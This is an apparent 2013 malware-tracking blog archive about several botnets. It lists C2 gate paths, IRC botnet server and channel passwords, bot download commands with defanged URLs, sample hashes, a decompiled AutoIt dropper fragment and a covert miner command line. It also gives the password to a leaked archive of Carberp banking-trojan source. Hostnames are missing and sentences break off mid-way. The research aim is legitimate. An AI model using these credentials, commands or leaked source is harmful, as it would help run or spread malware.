Month: June 2013 (Pony loader hosted by

Resolved to Server: Gate file:  /p/stats.php This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it. Betabot login: hxxp:// Related md5s (Search on for samples): 7ec71449228f4209b9df59bb68ec3a5f Hosting infos: (Irc botnet hosted by

Resolved to Server: Port:  1989 Server password:  r00t33 Channel:  #xxx Channel password:  r00t33 Topic for #xxx is: !open hxxp://www.fullhdizle.coTopic for #xxx set by Coder at Wed Jun 26 14:02:37 2013 Related md5s (search on to download the samples): 8cbdc21108b468ecd95644f18b83324d Hosting infos: (Athena irc botnet hosted by

Server: Port:  6667 Current local users 436, max 2038 Channel:  #network #network         411  Related md5s (search on to download the samples): 891905810486c6dee6d246f9845fb5cd Hosting infos:

Carberp The Banking Trojan Source Now Available To Public

First Zeus now Carberp source are leaked to public Picture from dk forum Source and passwd for the rar archive are available via twitter thnx to ivanlef0u Another link for the source here(around 1.88GB) Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh” (Betabot http botnet hosted by

Resolved to Server: Gate file:  /b/order.php Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using a http bot. Unfortunately for him he chose to use the l33t Hackforums bot Betabot with a 1mb stub Autoit crypter, but I guess he can only manage to’s botnet hosted in Luxembourg Steinsel Root Sa)

The bot is downloaded by this autoit sample: hxxp:// wich looks like http autoit downloader login here: hxxp:// another sample downloaded from the dava.ese is this: hxxp:// Betabot) here dava.exe decompiled: $at2 = “0” $at5 = 0 $at1 = “0” $at3 = “0” $avm = “0” $asb = “0” $at4 = “0” #NoTrayIcon #Region #AutoIt3Wrapper_UseUpx=n (Irc botnet hosted by

Resolved to Server: Port:  80 Server password:  passwd Channel:  #root Channel password:  redem !NAZEL hxxp:// a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp:// a392564eae140562e4b27d0ab078ba1e !s -n A modified ircd is used, so you may have trouble connecting. Alternate domains: Bitcoin mining info:  minerd.exe -a scrypt -s 20 –no-longpoll -q -o -u anonymous.1 -p -x